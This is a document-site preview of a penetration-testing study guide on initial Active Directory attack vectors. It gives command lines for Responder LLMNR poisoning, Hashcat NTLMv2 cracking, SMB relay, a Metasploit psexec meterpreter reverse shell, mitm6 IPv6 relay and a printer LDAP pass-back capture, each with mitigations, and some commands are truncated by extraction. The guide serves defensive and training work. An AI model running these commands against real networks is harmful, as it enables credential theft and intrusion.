Attacking Active Directory: Initial Attack Vectors, Essays (high school) of Computer science

An overview of various attack vectors that can be used to compromise active directory environments. It covers techniques such as llmnr poisoning, smb relay attacks, and ipv6-based attacks. The requirements, steps, and mitigation strategies for each attack vector. It also discusses how to gain shell access using tools like metasploit and psexec. The document serves as a comprehensive guide for security professionals and penetration testers to understand and defend against these initial attack vectors targeting active directory infrastructure.

Typology: Essays (high school)

2021/2022

Uploaded on 06/04/2024

abad-hussain
abad-hussain 🇵🇰

1 document

1 / 14

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
Attacking Active Directory: Initial Attack Vectors
1
Attacking Active Directory:
Initial Attack Vectors
Eslam Hassan
LLMNR Poisoning:
LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when
DNS fails; previously NBT-NS
key Flaw is that services utilize username and NTLMv2 hash when appropriately
responded to. (and we can intercept that)
Requirements:
1. LLMNR must be enabled
2. we need to run this early on the morning or after lunch when people are logging
into their computers
Steps:
1. Run Responder tool in Kali
Responder is going to respond to traffic
ip a
#note interface
sudo python /usr/share/responder/Responder.py -I eth0 -dwPv
or
sudo responder -I eth0 -dwP
-I tun0 (if you are using a vpn/tunnel)
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe

Partial preview of the text

Download Attacking Active Directory: Initial Attack Vectors and more Essays (high school) Computer science in PDF only on Docsity!

Attacking Active Directory:

Initial Attack Vectors

Eslam Hassan

LLMNR Poisoning:

LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails; previously NBT-NS key Flaw is that services utilize username and NTLMv2 hash when appropriately responded to. (and we can intercept that) Requirements :

  1. LLMNR must be enabled
  2. we need to run this early on the morning or after lunch when people are logging into their computers Steps: 1. Run Responder tool in Kali Responder is going to respond to traffic ip a #note interface sudo python /usr/share/responder/Responder.py -I eth0 -dwPv or sudo responder -I eth0 -dwP -I tun0 (if you are using a vpn/tunnel)
  1. Obtain hashes and crack them using Hashcat hashcat -m 5600 ntlmhash.txt rockyou.txt #-m 5600 for NTLMv #ntlmhash.txt contains the hashes .\hashcat.exe -m 5600 .\hash.txt .\wordlist.txt --show (to show the cracked pw) #you can ues Rules -r OneRule Mitigation : Disable LLMNR and NBT-NS Require Network Access Control Use strong password policy

SMB Relay:

Instead of cracking hashes gathered with Responder, we can relay those hashes to specific machines and gain access. Requirements : someone login or access our \10.0.2. SMB signing must be disabled on target (or not enforced) Relayed user creds must be admin on machine (local admin on their machine) Steps: Discover hosts with SMB signing disabled nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24 -Pn #we need to note down machines with 'message signing enabled but not required' vim targets.txt #add target IPs Edit Responder config - turn SMB and HTTP off because we need to make sure that these captures are relayed vim /etc/responder/Responder.conf #turn SMB, HTTP off SMB = Off HTTP = Off

Mitigation : Enable SMB signing on all devices pro : completely stops the attack cons :can cause performance issues with file copies Disable NTLM authentication on network pro : completely stops the attack cons: if kerberos stops working. windows defaults back to NTLM Account tiering Limit domain admins to specific tasks Local admin restriction to prevent lateral movement con: potential increase in the amount of service desk tickets

Gaining Shell Access:

  1. through metasploit

a. we can login with a domain accout (pparker) b. or we can login to a local account with a NTLM hash #this step has to be done once we have the credentials msfconsole search psexec use exploit/windows/smb/psexec options #set all required options #such as RHOSTS, smbdomain, smbpass and smbuser set payload windows/x64/meterpreter/reverse_tcp sho w set LHOST eth

#try multiple options if these tools do not work (blocked) #such as smbexec and wmiexec

IPv6 Attacks (refer mitm6 attacks and NTLM relays for more

info):

  1. start the ntlmrelay
  2. start the mitm6 and wait
  3. action happens (a user reboot or relogin)

ls lootme #contains useful info #if we keep the program running in background, and the user logins, the creds can be c aptured Mitigation : Block DHCPv6 traffic and incoming router advertisements. Disable WPAD via Group Policy. Enable both LDAP signing and LDAP channel binding. Mark Admin users as Protected Users or sensitive accounts. Pass-Back attacks can be used for printer hacking.

  1. Replace LDAP Attributes we removed the existing LDAP Server Address, 192.168.1.100, and replaced it with our IP Address.
  1. create a Netcat listener on port 389, which was the existing port in the LDAP settings of the MFP. (or Responder)
  2. Capture Credentials

Initial internal attack strategy

  1. begin day with mitm6 or responder
  2. run scans to generate traffic
  3. if scans are taking too long, look for websites in scope (http_version)
  4. Look for default creds on web logins a. printers b. jenjins c. etc..
  5. think outside the box